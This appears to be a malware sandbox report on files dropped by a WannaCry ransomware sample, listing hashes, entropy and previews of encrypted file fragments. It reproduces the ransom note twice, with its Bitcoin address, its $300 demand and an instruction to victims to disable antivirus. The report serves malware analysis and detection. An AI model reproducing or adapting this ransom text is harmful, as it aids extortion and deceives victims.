                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80916666933428
                                                  Encrypted:false
                                                  SSDEEP:24:bHLAOC+rEuhVUQTC5+lboUzWSjTn2PBtfiz4rJLwuRQ6xJfyLMEQW:/YiEE+QOYlf32pt6zMlF7fyLL
                                                  MD5:5D0883E414799FDD01AE76AB7E3AA011
                                                  SHA1:ED13947D25F076C6E7C8E7C3204B9EFCB93D7BFF
                                                  SHA-256:5BF3B7F06951E6BD99B1224E6AA8B769F4C12F5E6DB6633513D2DE32546CFB2A
                                                  SHA-512:AAC1FB4F862E4862042E91024C65363B78A977A00D0D3E580F3D37B47F788C83E4A72FF64100574A86CF5ADCFC7E9A4EE17B3D9D64AC91B4FC40BBACE8BA25C7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.841822084956088
                                                  Encrypted:false
                                                  SSDEEP:24:bkbT8tj5VNynue7l8lR9Z69mjJZVOpVQbPyBoUhYquPs0+cKfDK/VfwGWi1tD0B1:bkbT8Z5Vgnjl8L949wXVOpuPmbAdNxNs
                                                  MD5:5AC3AE0CF72C947AC8DD60D72A4DD827
                                                  SHA1:13ED5244A979D467FA15DA9E941CD434BB1AA77E
                                                  SHA-256:947F07A64510F12F0C814E5A5952A66D4730C468F168CA24C0702B632BDA58D7
                                                  SHA-512:004FC9003653E7F19999834316A0D8396B43F51E22AE196B66408A48B9502C9CE0FBF2A91F298324BF61A44794E45EFB557BADE91D52EA7D7D53E0808B7B0602
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....$.......y2o....S.9........E.r..g.0.f.....s.@......W..Mkip..../[..>....j0..e.[...Dx..)^x|..r..@...X..lw..}....<,.Q..sP.L.uf.{-g?:..E..m.WLk.v.gA.|...bn...;Kz..aQJK....E....g.XtX.y.(@..G..*....l..@.38hx...il =u...2t.NK.kl..i.[l.q...OOp...,.".l.............i.x..9n.-.zj%C........D&.P.........\....=<...C...3.....c.I.....p.O.Yd.s...V.].U......a.(..~..R|..L.8..o....]..M[Ed..y...gy.i....g..b...yo|..z%....d.....,.#.....M...A.[4......(.........V..L..M..x"..`f...K....gV........@.....i..;h.-.x9K..O7..4s....U..Ory......C...'..4..F...?Zg.$.e..CO.w...A0...ud.. .w..|..J.q....%..Y=.._............LC#9K...~n..."...$../... .x..seK..%.,...a.Vv....t..i2.x....F...6..0....".3uTV..d|.^^.h}..rZIUf.....&.....y..".:..|V..[.f./$Ja.N..,..S...&..p.?....)`.17...*h.n..g:.j..s,...0..'s..d.....}.@....0 ..|...Db}.5......:..N3.$V.......]...a.....d.......S.b.DA...*:.<...(.+....".....S...{7..{....7@......c.[./..R....."...Fd..d....D../..c.m.t...7....,.....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799115671762158
                                                  Encrypted:false
                                                  SSDEEP:24:8Lb888eS3BlYjHAjitpi+aBxGmsdY0uhMdf529:8LA8Mot7mPRXzqf56
                                                  MD5:24713DB2386E3442F858334B82AEF8E1
                                                  SHA1:1ACEF0FBC96CEB70D2E8C0128AEC4F22B41DB9B9
                                                  SHA-256:A1C82418F3CF9DD0FBC657645E28BF5F35B060DAEE7A0BFAEABCAB41DD61F211
                                                  SHA-512:C2AFE9C5417FBD01329E0F73CD8A485BFA384AE7F5EBF28C194413099B5F647259B991622D41B4C8D2E6BDE8BF17DB7EDFBD8DB916ADE357D5F6007F3FCCD169
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.844759133706299
                                                  Encrypted:false
                                                  SSDEEP:24:bkmzeh1lMLPdJrL9XAt3GKNq48cJvVM9Mv+XbOvsOzVF:bkLh1lMrPv9X3KB8cJtM9MvsIsOT
                                                  MD5:178AAAFE48E45AE777FE3651BB941569
                                                  SHA1:2BF96C029D9C2DB50E54ABE7EDF5B288F99EFC6D
                                                  SHA-256:24707E9127F4C33B198B9E58A6159293403ED94F94A295BA44EEC754A7AC75AD
                                                  SHA-512:17AEEB1953368A3FE849C0B58D31367C309C20C2C2A3A12EF33BB81A16CA8A26897A45A7F0F85D3E7F27A0181651B64F0C103C6A417FC666949CDD34F7D6761F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....k./R.@v..2X../z..b.8...A......3..'.:.Dy.`....M._..L.j....x.-..a.z.+..u.`..j9..~X..Y.w..ln......o.0..3....W&.hN...yI.d#P..T.......t..St\Fy..Z..q.*[.*.8.......D..-c#...x.vP-ct&'....[.#....m...;........#.."....@..B........rS...`._".I...u.7..F.j............Z..KL..wyk..]7....L.q..w.6p......S]`...>.......c..oi-...L..B...*uT.@.\...xAL.=UO...sXK>G..b...+..B...g......`m...]...G..).Iy.G.y....3\.......nq1..XU^B`v....f.!..E...Eh....T%.o.g.t.c|...m.&....k>.".....Ab.04...dO..i-..yI.Z_./=..t#.......W....f............c.'/Hs..Y*....k.x.X.sG..~.V.*Sl%K...B...%D..n..O.lUN.E..;v....cH.%.|.Bc....Y.\m.....84&O............z.f.p'P......%..0k.s...}Lg.....\P.]....mT.s'..X{.+3m..lm..h7.H..1.....tF~...X)]&..z....B..(..f.BD.y5..Z:.c.K...m......Xg.l|...}>'.F..oZm.tU..y.........."..=$u:.v&.In......X...E].~.5..Ln9..)t.K..M.....C..k.:...R..999.......w..#..../*..3.......P..T.....J...~|..>......*k:..l,~....../Z.A..k.R....uc....j4.O.....KV...3:..Jp...m....O.p....-..
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791364155426318
                                                  Encrypted:false
                                                  SSDEEP:24:kvH1luMGxrwSp2hYTVHuh4S38FDgjmpb0+mJFC5LskgFfrGPtO9:SuMGhhrT9uhr8FDgjib0tLieFClO9
                                                  MD5:C6C9793C9BD4121C420F5224B8C4C994
                                                  SHA1:5BFF65B6E212C788A79DF86F1D2426C44DB05783
                                                  SHA-256:CD32450E810D600F063AB39072861C6A9A08CA42B845E2CB0264BDA6D11EDB8E
                                                  SHA-512:CE5A64F848BB13C99C908DC271E6EFD012387E504E7290BFB57B122F29FCA21C24053E037B82A7F834EBD4DEBB948DA9B80DB5B56F9BCEEBFF976AD44ACDF320
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833853175843866
                                                  Encrypted:false
                                                  SSDEEP:24:bkdlrqiVJpea7mFnljPmg1plMi9MkxnhD9QpZVJrlZGhqU5rsaNg:bkbrqAea7mlIg1Hljnhp+Vtncqosmg
                                                  MD5:8C386416994C95F9BEC9885DF42C035E
                                                  SHA1:06C888619D8BCFA2B615425B3DBEC24504332AF9
                                                  SHA-256:F9EE546D4BFBAD65F203595F2F1B63CF085580424D7E352FE8FCC01A0399206B
                                                  SHA-512:F40D42D5E09DF982E5FEDFCE83447ACE3A9FD3AF77A5E7330E0D3CCC3737A4B867FA941F79D708EB1627276A07F5E14BA91C74C9A4DE712C9F4DC17A05459C26
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R.....{i>c..0..... T.MB..^Lr......C.B.......S|..B...N.o.....?......X..nG......A<.V...mU.X..Z.zJ{F9.IT.E$.....9.f...lg.l....#.Y_..w.....&...{-s......3h..~.Fg....>.u......2..*.O.L%4...=.j......2.uB....6....:..5.|.....Fqa.G..b._#.aQ.A*...K.i6..)..............{.u..P4.U.u..'..G`n.|/>...]Z...+.U..a_.&OG...`y.@..@....AA.*.7.$..[.8.....A5...y..Z.`..)}T....vR....D-P.e.s.{.....w"..?....9....5X5.\o|..].o......U .....$.d....asdbI.."...r0...>...r_...S_5..k]v.....}.........y.!.K.b...=.-.cX.).5....$....=Y.}.^.).........^...r PDh..XAjG.......{V8..[....S...S....)..F=;....Y.5.I:.f.x.M.ad.$.o.L..k.%..Y.|...X\.I.G..D..J..0...............#7.Tvs#P..Z>.S..7..$.[.0...L.T.0) D..;...>aiX.H..x.H,..k..a#...'.7...L....."...T.N..a...".H.3g?H...K....>#c.;..W..).f...^09._.n.B.K...X......$b.3X.2=%.C..q.&!.M..,....5..3-O.v..>.d.~..~.4..T....G/...b.......s.F.0..}ig.JE.k. ...Tr.88....J$.{>`..e/...n...,`s\...~..W.;.A:_..A7.6.7...^..P...4j...h..j..M.........l^__/.K.
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80302777717371
                                                  Encrypted:false
                                                  SSDEEP:24:QSdrH5mbDGPBdXyJ62A3jwntZp/9X42CM1M9/e:9Z5mbDwXuA3MnnH4TM1M9/e
                                                  MD5:964053BCC473411E2E9D9F88820AF2AD
                                                  SHA1:340E5D70FDCE293A8021C9566ED23F70378B29A7
                                                  SHA-256:C292D177C2685E91B460FD0701BC26CBC53D579C2D6E7002F05116963E545EF4
                                                  SHA-512:0716967AD15CB2A4B30BB7D52F2396D4E159913D60E637ED87F05F1214AE8793C80939AB983E301BA2CDBB2EF6DD4178DBEDCC777F4AC4D8F2CE44176E686796
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826927261370782
                                                  Encrypted:false
                                                  SSDEEP:24:bkVxqyceHP9reVPlGWVx7ZvrFAo43ahRqwGoxzc1Peu:bkVxZBcPl5j9vrFZdLJ0eu
                                                  MD5:194D446E71963BAAEEE43C2ED9985CA2
                                                  SHA1:130A8B448E079D933B1CDEE8764DB697FE645103
                                                  SHA-256:58A3E00FBA82996AB482BFC41E9866CDA0D83456E495B10CAFAE50CFF7B5DF1C
                                                  SHA-512:B76657B49772688D39610845BE8168F933319BF7B3880815E9400442EAE28CECC256942DEDC1A7CE5BEA783C9EF66CAF33DAE2F5C5272A37CB384529A922A06B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..............>|..:..ej3..jU..y.i.}.XFI....I..8XE.A.>...3W6......".........\i..2.....P.@Vl{<..!6...N.\.su3..)4.....B.b6Pb.A@r.G.@y.rq.O..e.6..j..q...+7.'|..Qj.. u.R...lt. ...........Q..3.H.U..ym.k....)d<...]...1'..u.P....c..._.tv...c.,wD.G.8.............<.Y.|..$................. ..a3.q..>.k.h.O.r.^.Q.L...g.....=....A."`...5q....S.w>A.>?...<...xP[:I......w.=.s.W..5...3...O..i..x.T.....b..$..%.L~..0......K........K.m..e/-Xe1..J......N....|5...L..X.......3e._.x..kL...(..=..Y.......$..=._N.....'.n...U...>..J.........V..[..[k.V.;5..5.9.<f..~3....Z.....7.[.....^....bb\2.082C(j...N.I0p.T.....p...;....p..F.9Fyv....[../C.+............>.....6.wg.fG.9.~.27X..}fp..NJw^.......l.R.G.IZ$.D.....'...xV....'w.|....].O[Q.0..}..%..6K:<..Z%z?J...n.[f|.....|\..:z6>.......%..........C..v.N.{]../5w.p........=i.GN.2.._...D%..s..U......6.?X..r.s'..jj...q..Q("k..c}..B.2..r...?.k.Q.D.....[.PHf.K#...B_7.t..O....C..0..g.@3"S:_i..ZK8F@..R. ..O.... D...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826927261370782
                                                  Encrypted:false
                                                  SSDEEP:24:bkVxqyceHP9reVPlGWVx7ZvrFAo43ahRqwGoxzc1Peu:bkVxZBcPl5j9vrFZdLJ0eu
                                                  MD5:194D446E71963BAAEEE43C2ED9985CA2
                                                  SHA1:130A8B448E079D933B1CDEE8764DB697FE645103
                                                  SHA-256:58A3E00FBA82996AB482BFC41E9866CDA0D83456E495B10CAFAE50CFF7B5DF1C
                                                  SHA-512:B76657B49772688D39610845BE8168F933319BF7B3880815E9400442EAE28CECC256942DEDC1A7CE5BEA783C9EF66CAF33DAE2F5C5272A37CB384529A922A06B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813001683623214
                                                  Encrypted:false
                                                  SSDEEP:12:8DnXLlPqJ+yeYbc5rH1Rbxqfx3slCVYGGcy6LDlqp4IK7GetDRg2RzrjEsX/NYwA:8D7QJbLKb9qTGclRqsGqrYCAMBTOo2
                                                  MD5:80CF306836A6F1C049996E8B35B2CEB9
                                                  SHA1:A6956BEC1B2EAC605BE8C97C9E0ABE6162AC0494
                                                  SHA-256:A783CBD3F5D1E92A9B6B7CD0ED548169082AD43B2344C86BC7C34ABC0C5DEC94
                                                  SHA-512:631FBEBA01097D533053C089B36F20A4DC43B3676FA594DD53560C32E34FEE1A6D6D021F8867EB9F76E7BC863654BABA7210C4C3F38952337615C874A380A8D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.827763135430909
                                                  Encrypted:false
                                                  SSDEEP:24:bkTaZOB7oB2WAFTNvNwIrB7oIzD2OoixMEPWl:bktBTFTtRzquul
                                                  MD5:6527F2BCA238AC348A94B962BBAD72E5
                                                  SHA1:930CA73CDDC38B6D8F00ED85E7E39C10D14C3C1C
                                                  SHA-256:5C80F6B9FFB80688DDC9594F918115AC1A1813E8A6CCDF1A18A45B9218371FEE
                                                  SHA-512:3FD3AA3C716E8AF9D543F3AF7228B2224C45AF65FDC59E9C8F656814827F796EE34E31EEC575D499C592A122D9C81B35E9CEEEADDF60EA03DAD73B7E6BBFA64E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.793923022248367
                                                  Encrypted:false
                                                  SSDEEP:24:3BJpoI5t3M0Aw0nRn2v5dVhmx/+dXdVp6JdG+14X2P0XJU:Jpb3M0AhnxS5dV2/+dh62+ymsZU
                                                  MD5:772B750197A3F37CA8168029FCCD81C9
                                                  SHA1:FA47ABC9C69F2A4F3561912504ECDE85D9764593
                                                  SHA-256:82765F72AF9CD140FFE169E53A2E05234BBF6FCE9BBC77D98BD9D4BA5415C24E
                                                  SHA-512:D9D168E76C90778D4BA847E95D9AEF28539776F712178158B68357236A34E8598E0CDFA5BD2D3BE3F97B856726D58BB721A85E389ECAE6B58863AD5E1177E520
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848765223419081
                                                  Encrypted:false
                                                  SSDEEP:24:bk+hfEsrKKC+dm4kqvXZDcr0nyF9rRcmbOpCR7Y8YF7msdR2cInKvKAnRfo:bkgssrKKCijDcrUm9rrQemDDvKefo
                                                  MD5:89D14FEE4F1886AC608D523342A71B1B
                                                  SHA1:B41891E5BC639DA165601FCAD9D139043FC02BC4
                                                  SHA-256:6FB75EBC0DDB8A4E5D6A951D9ABEDB89A91C1E7C1798ABEE8A572F5ACA6DBF88
                                                  SHA-512:B25399C537839D3B3CB84C04F8E6B3D031C1562617BF72B26E5AB0621AFDE50DAFE9730B607707A44948D85FB3891C03170DAD70669421CAA22897F377AED286
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823920902058649
                                                  Encrypted:false
                                                  SSDEEP:24:UWQ81IK4t8HhWioZuzNlHCLTpiP+zqi/qsL0cocJQO02Ba:UWhIDtaoYzNliLTYxaqEDJha
                                                  MD5:B8DFB1B4BC3E8B1C811AB24C19B587CA
                                                  SHA1:58B0ABCF7B827090B8D9B4B02A908C6925AEE619
                                                  SHA-256:A10E25A0F4497554CF3DCE7A94D4E9F961AE0F6BC37721EA456DBA98CFD96A2F
                                                  SHA-512:20A4D23E77B24B70F703DE429BCB06BD57F8D0E394800A46FF539CA93424A806D1EF60750767414EA465E2B79AD5C906FBDDD04182084C507AF3DFD5B88DA98A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842508571135768
                                                  Encrypted:false
                                                  SSDEEP:24:bky42JTv31rDwZ4gTqlonWl3HT3xDF/fISm8uyQwvbCKDWGD1N3BZF2tF6B/87qA:bkCv1fQ4gGGwz3b/fIPyQwXvB2n4JW
                                                  MD5:28108D8BA5DD270EB65D9DC6CBF25443
                                                  SHA1:D6C468CB66562457994D11B05398971EE4ADED60
                                                  SHA-256:396342E5AC2ADF598F926817D2E14AD1833EE1CAA3E117543877778E001B5752
                                                  SHA-512:54390B392D8D430554132772CA1C8C0EF54F0820DCBD45B1618E117E9513A618E28399D0C5EAE7BC44D7C563F6E2F63B1D7E8FDAE218FE7D77DCEDDD0DA35944
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847470339597998
                                                  Encrypted:false
                                                  SSDEEP:24:IHbWiRAMeypooJ99aSAC5CCuTSYLd+Xhg3312vNhTSxqi:IHbWiR7Dpo69+C5CCGSLhg3AGxqi
                                                  MD5:38BB5FD980EF362A67D9A563E5A71B7A
                                                  SHA1:F41BF4E84333E8EE48F5913463F4213C95218B54
                                                  SHA-256:E98EA4E4E143432D3A1B186B024C5A3DB37F982975E2081507A9D38447262EA8
                                                  SHA-512:3AFA61CA1857903FA4B86106FFBEFFE93633121507F994C4022703D540C45403BE9E2D4168ADF421561DD4B75196F06CC39E035D53B6DD17395588EDB1606B05
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.83605635943125
                                                  Encrypted:false
                                                  SSDEEP:24:bkdRrqwzhINz0exYu9Hq0QblsB2j+DmT3aF3DEcTlxMlUUYvFQ2:bkLqwG0exq5sgj+DmKlAh+Q2
                                                  MD5:E6F66D68F7964A1BDE8D78A8298A36E8
                                                  SHA1:BAF4384EC83DF5909838DB7677F5D95DCF6B7158
                                                  SHA-256:003E39CD4735153EECA690CF7DCE033D830E811403D1A2E70BFD644A98C14281
                                                  SHA-512:02E3DEBCB0F3E5D2BE2B40D54C0EEE326BF6A2A9552E6564024D5054548F2EA52AFFA861BE85BCCEC7AF153834C9AD52EB3C96E523BDC3D4ABD42DA3B57C24DC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824497585972653
                                                  Encrypted:false
                                                  SSDEEP:24:wNW6UhztvV18Z7r20GM2zDStrz3+X95gX2oAhYDv97iTH:SW6UhhE7rhD2keXbgtA+Dv9ej
                                                  MD5:B0507E493A900C25C0C1F53008553840
                                                  SHA1:66BB53B0D1B4CAE13B4358BDD627193EDECA9858
                                                  SHA-256:79A47E41890CCF62983FB1E84DE25C6B5AD42A8942082FD6418B988F42680F3E
                                                  SHA-512:E607B204545D55C8395FE950F452A3538C88FD1E412362FCB5B3BB041CFB953FA30967007D12240159146D694E100158605FA47B0E3E45E52676E0FB2C33F58A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.832537735815458
                                                  Encrypted:false
                                                  SSDEEP:24:bk06u2qOMmqVhAac/JNt3tSkpcmaSleRbo/uUddv9qjjUmjm:bk060j8JtSvm8nUjM7m
                                                  MD5:1520CBD73B1F0C9940D11969152D2565
                                                  SHA1:E634B5E7F6407F8481A239B3218AAAD0995B029C
                                                  SHA-256:9E611FEE0749A188DD155D8D83BB829C6C447784E99F2768998D30D804D1A024
                                                  SHA-512:FA5BD8AD6067027F723D141C2A20A02B3FD35ECA80CE68057E99B620E417DBABEB818FE166D6537662D6ACCD67FE8592C1550B218AFB45F054084EE8B39FBDC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.782576802731599
                                                  Encrypted:false
                                                  SSDEEP:24:0xbZy+wiSW7xX5ijM6SLaFjifUBp2+TIIAzZemJvpUYT:0dZdwidxJijMtaJisBp2+NAbJRVT
                                                  MD5:1745903D46EAC6D840523E9D16967F5B
                                                  SHA1:DE9F31E627556E04D95DD5938C5293904825A934
                                                  SHA-256:A7FD505AE9D11AF874ECD1436CF5C50C7E7DE787C5F7D90B72039992DFDF5EDB
                                                  SHA-512:1C5DEED0EE5FA3B6F33C5C7C5F685394DDBF322F4B94398F8DE8385C82A549E27D4CA330566373614C3948876B6E74868B5800D209D639EE50F8F3CE833B8BD4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842467662200263
                                                  Encrypted:false
                                                  SSDEEP:24:bkgC3CQMsRErlKJU7/ul+qAjCqybKAo8HErJ8/5E5izYyZJPuDdEoOSubXSr:bkgC+AErlsUuLAj80Rri5E5icyZRAdE+
                                                  MD5:E572E09DE64EFC193AC7C31ADE379ADE
                                                  SHA1:AB7BDA4C42FD7A44A4F025C9F3E834066D88598A
                                                  SHA-256:3BA6F70A72BAB5CF1A532BEF3F41D569D8E722C93932ACD2F4CAA50CDA748064
                                                  SHA-512:A32D4FDCFA93F4441D46AE378AD7937562459409FB55D6AFA578D107838534EF0EF2E627C5CB001A242141E23CCC889BF76AFC4DD5FDF0D465543C3B18022781
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.801972753416064
                                                  Encrypted:false
